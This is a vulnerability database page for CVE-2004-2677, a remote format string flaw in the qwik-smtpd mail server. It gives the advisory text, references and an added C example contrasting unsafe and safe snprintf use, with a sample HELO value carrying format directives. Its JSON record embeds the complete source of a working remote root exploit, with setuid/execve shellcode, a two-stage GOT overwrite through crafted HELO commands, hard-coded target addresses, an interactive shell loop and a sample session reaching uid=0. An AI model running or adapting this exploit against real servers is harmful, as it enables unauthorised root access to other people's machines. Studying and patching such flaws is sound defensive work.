qwik-smtpd Remote Format String Arbitrary Code Execution
2004-10-31T06:15:08
ID: OSVDB:11303 | Type: osvdb | Reporter: Dark Eagle (darkeagle@list.ru) | Modified: 2004-10-31T06:15:08
Description
Vulnerability Description
QwikMail SMTP (qwik-smtpd) contains a flaw that may allow a malicious user to execute arbitrary code via a format string vulnerability in qwik-smtpd.c. The issue is triggered by sending a specially crafted mail request. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality and integrity.
Solution Description
Upgrade to version 0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
QwikMail SMTP (qwik-smtpd) contains a flaw that may allow a malicious user to execute arbitrary code via a format string vulnerability in qwik-smtpd.c. The issue is triggered by sending a specially crafted mail request. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality and integrity.
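The bug class named above, shown as an added illustration for this page rather than qwik-smtpd's own code: a Received: header is assembled from client-supplied SMTP fields with a literal format string (safe), then reused as a format string (the defect), beside the hardened form that passes it through "%s". The function names build_received, render_unsafe, render_safe and count_format_directives, the field names and the sample host values are all assumptions made for the example; count_format_directives is the kind of check an auditor or a log-based detection would apply to HELO and hostname arguments.

```c
#include <stdio.h>
#include <string.h>

/* Assemble a Received: header from client-supplied SMTP fields. The format
 * string is a literal and the client data is only ever an argument, so this
 * step is safe; the danger lies in what is done with `dst` afterwards.
 * (Hypothetical helper, not the qwik-smtpd function.) */
int build_received(char *dst, size_t dstlen, const char *client_host,
                   const char *client_helo, const char *client_ip,
                   const char *local_host)
{
    return snprintf(dst, dstlen,
                    "Received: from %s (HELO %s) (%s) by %s with SMTP\n",
                    client_host, client_helo, client_ip, local_host);
}

/* Buggy pattern: the assembled header, which embeds the HELO argument, is
 * reused as the format string. Any %x, %s or %n the client placed in HELO
 * is now interpreted by the formatter. Shown for contrast only; never call
 * this with untrusted data. */
int render_unsafe(char *dst, size_t dstlen, const char *received)
{
    return snprintf(dst, dstlen, received);   /* BUG: untrusted format string */
}

/* Hardened pattern: the only format string is the literal "%s"; whatever the
 * header contains is copied verbatim, percent signs included. */
int render_safe(char *dst, size_t dstlen, const char *received)
{
    return snprintf(dst, dstlen, "%s", received);
}

/* Count printf-style conversion directives in a network-supplied string.
 * A non-zero count on a value that later reaches a format argument is the
 * signature of this bug class; usable as a code-audit oracle or as a
 * detection rule over SMTP logs. "%%" is a literal percent and not counted. */
size_t count_format_directives(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent: skip both characters */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char received[256], out[256];
    /* Constructed sample: a HELO argument carrying format directives. */
    const char *helo = "mx.example.test%x%x%n";

    build_received(received, sizeof received, "client.example.test", helo,
                   "192.0.2.10", "mail.example.test");
    printf("directives in HELO: %zu\n", count_format_directives(helo));
    render_safe(out, sizeof out, received);
    fputs(out, stdout);          /* printed verbatim, %x%x%n left as text */
    return 0;
}
```

The fix the advisory's upgrade delivers is the render_safe shape: every call that takes a format string gets a literal, and untrusted text only ever travels as an argument. Compilers flag the render_unsafe shape with -Wformat-security, which is worth turning into an error in builds of any network daemon.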
References:
Vendor URL: http://qwikmail.sourceforge.net/
Security Tracker: 1012016
Secunia Advisory ID: 13037
Other Advisory URL: http://unl0ck.info/advisories/qwik-smtpd.txt
Other Advisory URL: http://www.securiteam.com/exploits/6H0062KBPM.html
ISS X-Force ID: 17917
FrSIRT Advisory: ADV-2007-0687
CVE-2004-2677
Bugtraq ID: 11572
{"edition": 1, "title": "qwik-smtpd Remote Format String Arbitrary Code Execution", "bulletinFamily": "software", "published": "2004-10-31T06:15:08", "lastseen": "2017-04-28T13:20:06", "modified": "2004-10-31T06:15:08", "reporter": "Dark Eagle(darkeagle@list.ru)", "viewCount": 1, "href": "https://vulners.com/osvdb/OSVDB:11303", "description": "## Vulnerability Description\nQwikMail SMTP (qwik-smtpd) contains a flaw that may allow a malicious user to execute arbitrary code via a format string vulnerability in qwik-smtpd.c. The issue is triggered by sending a specially crafted mail request. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality and integrity.\n## Solution Description\nUpgrade to version 0.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nQwikMail SMTP (qwik-smtpd) contains a flaw that may allow a malicious user to execute arbitrary code via a format string vulnerability in qwik-smtpd.c. The issue is triggered by sending a specially crafted mail request. 
It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality and integrity.\n## References:\nVendor URL: http://qwikmail.sourceforge.net/\nSecurity Tracker: 1012016\n[Secunia Advisory ID:13037](https://secuniaresearch.flexerasoftware.com/advisories/13037/)\nOther Advisory URL: http://unl0ck.info/advisories/qwik-smtpd.txt\nOther Advisory URL: http://www.securiteam.com/exploits/6H0062KBPM.html\nISS X-Force ID: 17917\nFrSIRT Advisory: ADV-2007-0687\n[CVE-2004-2677](https://vulners.com/cve/CVE-2004-2677)\nBugtraq ID: 11572\n", "affectedSoftware": [{"name": "QwikMail SMTP (qwik-smtpd)", "version": "0.2", "operator": "eq"}], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-2677"]}, {"type": "exploitdb", "idList": ["EDB-ID:620"]}], "modified": "2017-04-28T13:20:06", "rev": 2}, "vulnersScore": 6.9}, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "cvelist": ["CVE-2004-2677"], "id": "OSVDB:11303", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:23:01", "description": "Format string vulnerability in qwik-smtpd.c in QwikMail SMTP (qwik-smtpd) 0.3 and earlier allows remote attackers to execute arbitrary code via format specifiers in the (1) clientRcptTo array, and the (2) Received and (3) messageID variables, possibly involving HELO and hostname arguments.", "edition": 4, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-2677", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-2677"], "modified": "2018-10-19T15:30:00", "cpe": ["cpe:/a:qwikmail:qwikmail_smtp:0.3"], "id": "CVE-2004-2677", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2677", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:qwikmail:qwikmail_smtp:0.3:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T12:33:20", "description": "Qwik SMTP 0.3 Remote Root Format String Exploit. CVE-2004-2677. 
Remote exploit for linux platform", "published": "2004-11-09T00:00:00", "type": "exploitdb", "title": "Qwik SMTP 0.3 - Remote Root Format String Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2677"], "modified": "2004-11-09T00:00:00", "id": "EDB-ID:620", "href": "https://www.exploit-db.com/exploits/620/", "sourceData": "/*\r\n** qwik-smtp Remote Root Exploit\r\n** -------------------------------\r\n**\r\n** Bug found by: Dark Eagle <darkeagle [at] list d0t ru>\r\n** Exploit coded by: Carlos Barros <barros [at] barrossecurity d0t com>\r\n** Home Page: http://www.barrossecurity.com\r\n**\r\n** Exploitation techinique:\r\n**\r\n** This bug is a simple format string bug. While coding this exploit, I found just two\r\n** \"problems\". The first is that our buffer is only 32 bytes long and the second is that\r\n** qwik-smtpd filters spaces chars with the isspace(), this way our 0x0b code used in the\r\n** shellcode is filtered. To circumvent the first problem I divided the exploit in two\r\n** stages. The first one overwrite the LSW of the exit() GOT entry and the second overwrite\r\n** the MSW. Then, we send an EXIT command forcing the qwik-smtpd to jump into our shellcode.\r\n** The second problem was \"fixed\" using another char (0x10) and then decrementing it before\r\n** calling the int 0x80 syscall.\r\n**\r\n** Notes:\r\n**\r\n** You MUST enter your external IP Address (when attacking remotely) or 127.0.0.1 (when\r\n** attacking locally) cause its IP is printed before our buffer, so its length MUST enter\r\n** in the calculation of the format string attack.\r\n**\r\n** sprintf(Received,\"Received: from %s (HELO %s) (%s) by %s with SMTP; %s\\n\",\r\n** clientHost, clientHelo, clientIP, localHost, timebuf);\r\n** ----------\r\n** Destination MUST be one valid email address on the target machine. If not, it will reply\r\n** with one erro code like this:\r\n**\r\n** -> Sending RCPT TO ... 
ERROR - 550 user not here\r\n**\r\n** Screenshot:\r\n**\r\n** [barros@BarrosSecurity qwik]$ ./a.out -h localhost -u barros@teste.com -t 0 -i 127.0.0.1\r\n**\r\n** ==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==\r\n**\r\n** *** Target plataform : qwik_smtpd 0.3 - Fedor Core 2\r\n** *** Target host : localhost\r\n** *** Target port : 25\r\n** *** Target GOT : 0x0804b2e8\r\n**\r\n** *** Target Retaddr : 0xfeffe6f0\r\n**\r\n** -> Connecting ... OK\r\n** -> Getting the banner ... 220 SMTP service ready\r\n**\r\n** *** STAGE 1 ***\r\n**\r\n** -> Creating EvilBuffer ... OK\r\n** -> Sending HELO with EvilBuffer ... OK\r\n** -> Sending MAIL FROM with Shellcode ... OK\r\n** -> Sending RCPT TO ... OK\r\n** -> Sending DATA ... OK\r\n** -> Sending \".\" ... OK\r\n**\r\n** *** STAGE 2 ***\r\n**\r\n** -> Creating EvilBuffer ... OK\r\n** -> Sending HELO with EvilBuffer ... OK\r\n** -> Sending MAIL FROM with Shellcode ... OK\r\n** -> Sending RCPT TO ... OK\r\n** -> Sending DATA ... OK\r\n** -> Sending \".\" ... OK\r\n** -> Attacking ... OK\r\n**\r\n** Try to send some commands. 
If doesn't work, hit CTRL+C to exit\r\n**\r\n** Linux BarrosSecurity 2.6.8-1.521 #1 Mon Aug 16 09:01:18 EDT 2004 i686 i686 i386 GNU/Linux\r\n** uid=0(root) gid=0(root)\r\n** exit\r\n** [barros@BarrosSecurity qwik]$\r\n*/\r\n\r\n#include <getopt.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <stdio.h>\r\n\r\n/*--< Prototypes >--*/\r\nvoid Usage(char *);\r\nvoid fatal(char *);\r\nint ConectToHost(char *,int);\r\nchar *CreateEvilBuffer(int,int);\r\nvoid doHack(int);\r\nvoid VerifyLastCommand(int, char *, char *);\r\nvoid SendBufferAndVerify(int , char *, char *, char *);\r\n\r\n/*--< Defines >--*/\r\n#define DEFAULT_PORT 25\r\n#define STDIN 0\r\n#define STDOUT 1\r\n#define MAX_BUFFER 1024\r\n#define NOPSIZE 200\r\n#define NOP 0x90\r\n#define BUFFER_OFFSET \"567\" // Keep these \\\"\r\n#define PADDING \".\" //\r\n\r\nstruct\r\n{\r\nchar *Name;\r\nint Gotaddr;\r\nint Retaddr;\r\n}Targets[] =\r\n{\r\n\"qwik_smtpd 0.3 - Fedor Core 2\",\r\n0x0804b2e8,\r\n0xfeffe6f0,\r\n\r\n// Finish\r\n0,\r\n0,\r\n0\r\n};\r\n\r\n// Shellcode by The Itch of Netric (www.netric.org)\r\nchar Shellcode[] =\r\n\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\" /* setuid(0); */\r\n\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\" /* execve() of /bins/h */\r\n\"\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\"\r\n\"\\x53\\x89\\xe1\\xb0\"\r\n\r\n\"\\x10\\x48\\x48\\x48\\x48\\x48\" // Modified by Carlos Barros to skip isspace()\r\n\r\n\"\\xcd\\x80\";\r\n\r\nunsigned char STAGE=1;\r\nint IP_Len = 0;\r\n\r\nint main(int argc, char **argv)\r\n{\r\nextern char *optarg;\r\nextern int optind;\r\nchar opt;\r\nchar *Host = NULL;\r\nint Port = DEFAULT_PORT;\r\nint TargetNumber = 0;\r\nint Sock,i;\r\nchar *EvilBuffer;\r\nchar Buffer[MAX_BUFFER];\r\nchar *Rcpt_TO;\r\nchar Mail_From[NOPSIZE+strlen(Shellcode)+20];\r\n\r\nint 
ttt;\r\n\r\nfprintf(stdout,\"\\n==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==\\n\\n\");\r\n\r\n// Process arguments\r\nwhile ( (opt = getopt(argc,argv,\"i:h:t:p:u:\")) != EOF)\r\n{\r\nswitch(opt)\r\n{\r\ncase 'i':\r\nIP_Len = strlen(optarg);\r\nbreak;\r\ncase 'u':\r\nRcpt_TO = optarg;\r\nbreak;\r\ncase 'p':\r\nPort = atoi(optarg);\r\nif(!Port) Usage(argv[0]);\r\nbreak;\r\ncase 't':\r\nTargetNumber = atoi(optarg);\r\nbreak;\r\ncase 'h':\r\nHost = optarg;\r\nbreak;\r\ndefault: Usage(argv[0]);\r\nbreak;\r\n}\r\n}\r\nif(Host == NULL || Rcpt_TO == NULL || !IP_Len) Usage(argv[0]);\r\n\r\n// Verify target\r\nfor(i=0;;i++)\r\nif(Targets[i].Name == 0) break;\r\nif(--i<TargetNumber) Usage(argv[0]);\r\n\r\nfprintf(stdout,\"*** Target plataform : %s\\n\",Targets[TargetNumber].Name);\r\nfprintf(stdout,\"*** Target host : %s\\n\",Host);\r\nfprintf(stdout,\"*** Target port : %u\\n\",Port);\r\nfprintf(stdout,\"*** Target GOT : %#010x\\n\\n\",Targets[TargetNumber].Gotaddr);\r\nfprintf(stdout,\"*** Target Retaddr : %#010x\\n\\n\",Targets[TargetNumber].Retaddr);\r\n\r\nfprintf(stdout,\"-> Connecting ... \");\r\nfflush(stdout);\r\nSock = ConectToHost(Host,Port);\r\nif(Sock == -1) fatal(\"Could not connect\");\r\nelse fprintf(stdout,\"OK\\n\");\r\n\r\nfprintf(stdout,\"-> Getting the banner ... \");\r\nfflush(stdout);\r\nif(recv(Sock,Buffer,MAX_BUFFER-1,0) != -1)\r\nfprintf(stdout,\"%s\",Buffer);\r\nelse\r\nfatal(\"RECV\");\r\n\r\nfor(;STAGE<3;STAGE++)\r\n{\r\nfprintf(stdout,\"\\n*** STAGE %d ***\\n\\n\",STAGE);\r\nfprintf(stdout,\"-> Creating EvilBuffer ... \");\r\nfflush(stdout);\r\nEvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr);\r\nfprintf(stdout,\"OK\\n\");\r\n\r\nfprintf(stdout,\"-> Sending HELO with EvilBuffer ... \");\r\nfflush(stdout);\r\nSendBufferAndVerify(Sock,EvilBuffer,\"250\",0);\r\nfree(EvilBuffer);\r\n\r\nfprintf(stdout,\"-> Sending MAIL FROM with Shellcode ... 
\");\r\nfflush(stdout);\r\n\r\n// Create the string MAIL FROM NOP+SHELLCODE\r\nstrcpy(Mail_From,\"mail from \");\r\nmemset(Mail_From+10,NOP,NOPSIZE);\r\nMail_From[10+NOPSIZE-1] = 0;\r\nstrcat(Mail_From,Shellcode);\r\nstrcat(Mail_From,\"\\n\");\r\n\r\nSendBufferAndVerify(Sock,Mail_From,\"250\",0);\r\n\r\nfprintf(stdout,\"-> Sending RCPT TO ... \");\r\nfflush(stdout);\r\nsnprintf(Buffer,MAX_BUFFER,\"rcpt to %s\\n\",Rcpt_TO);\r\n\r\nSendBufferAndVerify(Sock,Buffer,\"250\",\"251\");\r\n\r\nfprintf(stdout,\"-> Sending DATA ... \");\r\nfflush(stdout);\r\n\r\nsprintf(Buffer,\"data\\n\");\r\nSendBufferAndVerify(Sock,Buffer,\"354\",0);\r\n\r\nfprintf(stdout,\"-> Sending \\\".\\\" ... \");\r\nfflush(stdout);\r\nsnprintf(Buffer,MAX_BUFFER,\".\\n\");\r\nSendBufferAndVerify(Sock,Buffer,\"250\",0);\r\n}\r\n\r\nfprintf(stdout,\"-> Attacking ... \");\r\nsprintf(Buffer,\"quit\\n\");\r\nSendBufferAndVerify(Sock,Buffer,\"221\",0);\r\n\r\nfprintf(stdout,\"\\nTry to send some commands. If doesn't work, hit CTRL+C to exit\\n\\n\");\r\ndoHack(Sock);\r\n\r\nclose(Sock);\r\n}\r\n\r\nvoid SendBufferAndVerify(int Sock, char *Buffer, char *Code1, char *Code2)\r\n{\r\nif(send(Sock,Buffer,strlen(Buffer),0) == -1)\r\nfatal(\"SEND\");\r\nVerifyLastCommand(Sock,Code1,Code2);\r\n}\r\n\r\nvoid VerifyLastCommand(int Sock, char *Code1, char *Code2)\r\n{\r\nchar Buffer[MAX_BUFFER];\r\n\r\nif(recv(Sock,Buffer,MAX_BUFFER-1,0) != -1)\r\n{\r\nif(strstr(Buffer,Code1) || (Code2 && strstr(Buffer,Code2) )) fprintf(stdout,\"OK\\n\",Buffer);\r\nelse\r\n{\r\n*strstr(Buffer,\"\\n\") = 0;\r\nfatal(Buffer);\r\n}\r\n}\r\nelse\r\nfatal(\"RECV\");\r\n}\r\n\r\nvoid Usage(char *Prog)\r\n{\r\nint i;\r\nfprintf(stderr, \"Usage: %s -h hostname <options>\\n\\n\"\r\n\"Options:\\n\\n\"\r\n\" -i ipaddress : Your IP address\\n\"\r\n\" -u rcpt_to : Select one valid destination\\n\"\r\n\" -t target : Select the target\\n\"\r\n\" -p portnumber : Sets a new port number <default: 
25>\\n\\n\"\r\n\"Targets:\\n\\n\",Prog);\r\n\r\nfor(i=0;;i++)\r\n{\r\nif(Targets[i].Name != 0)\r\nfprintf(stderr,\" [%u] %s\\n\",i,Targets[i].Name);\r\nelse\r\nbreak;\r\n}\r\nfprintf(stderr,\"\\n\");\r\nexit(1);\r\n}\r\n\r\nvoid fatal(char *ErrorMsg)\r\n{\r\nfprintf(stderr,\"ERROR - %s\\n\\n\",ErrorMsg);\r\nexit(1);\r\n}\r\n\r\nint ConectToHost(char *Host,int Port)\r\n{\r\nstruct sockaddr_in server;\r\nstruct hostent *hp;\r\nint s;\r\n\r\nserver.sin_family = AF_INET;\r\nhp = gethostbyname(Host);\r\nif(!hp) return(-1);\r\n\r\nmemcpy(&server.sin_addr,hp->h_addr,hp->h_length);\r\nserver.sin_port = htons(Port);\r\n\r\ns = socket(PF_INET,SOCK_STREAM,0);\r\nif(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0)\r\nreturn(-1);\r\n\r\nreturn(s);\r\n}\r\n\r\nchar *CreateEvilBuffer(int GOT, int Retaddr)\r\n{\r\nchar *Buffer = malloc(500);\r\n\r\nif(STAGE==1)\r\nsprintf(Buffer,\r\n\"helo \"PADDING\r\n\"%c%c%c%c\" // GOT ADDR\r\n\"%%%ud\" // LSW(EGGAddr)\r\n\"%%\"BUFFER_OFFSET\"$hn\" // Write\r\n\"\\n\",\r\n((u_long)GOT),\r\n((u_long)GOT >> 8),\r\n((u_long)GOT >> 16),\r\n((u_long)GOT >> 24),\r\n\r\n((Retaddr & 0x0000FFFF) - (27+IP_Len))\r\n);\r\nelse\r\nsprintf(Buffer,\r\n\"helo \"PADDING\r\n\"%c%c%c%c\" // GOT ADDR\r\n\"%%%ud\" // LSW(EGGAddr)\r\n\"%%\"BUFFER_OFFSET\"$hn\" // Write\r\n\"\\n\",\r\n((u_long)GOT+2),\r\n(((u_long)GOT+2) >> 8),\r\n(((u_long)GOT+2) >> 16),\r\n(((u_long)GOT+2) >> 24),\r\n\r\n(((Retaddr & 0xFFFF0000)>>16) - (27+IP_Len))\r\n);\r\n\r\nreturn Buffer;\r\n}\r\n\r\nvoid doHack(int Sock)\r\n{\r\nchar buffer[1024 * 10];\r\nint count;\r\nfd_set readfs;\r\n\r\nwrite(Sock,\"uname -a;id\\n\",12);\r\nwhile(1)\r\n{\r\nFD_ZERO(&readfs);\r\nFD_SET(STDIN, &readfs);\r\nFD_SET(Sock, &readfs);\r\nif(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0)\r\n{\r\nif(FD_ISSET(STDIN, &readfs))\r\n{\r\nif((count = read(STDIN, buffer, 1024)) <= 0)\r\n{\r\nif(errno == EWOULDBLOCK || errno == 
EAGAIN)\r\ncontinue;\r\nelse\r\n{\r\nclose(Sock);\r\nexit(-1);\r\n}\r\n}\r\nwrite(Sock, buffer, count);\r\n}\r\nif(FD_ISSET(Sock, &readfs))\r\n{\r\nif((count = read(Sock, buffer, 1024)) <= 0)\r\n{\r\nif(errno == EWOULDBLOCK || errno == EAGAIN)\r\ncontinue;\r\nelse\r\n{\r\nclose(Sock);\r\nexit(-1);\r\n}\r\n}\r\nwrite(STDOUT, buffer, count);\r\n}\r\n}\r\n}\r\n}\r\n\n\n// milw0rm.com [2004-11-09]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/620/"}]}